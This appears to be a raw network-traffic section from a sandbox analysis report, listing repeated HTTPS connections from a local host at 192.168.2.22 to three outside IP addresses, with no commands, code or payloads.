                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global trafficTCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
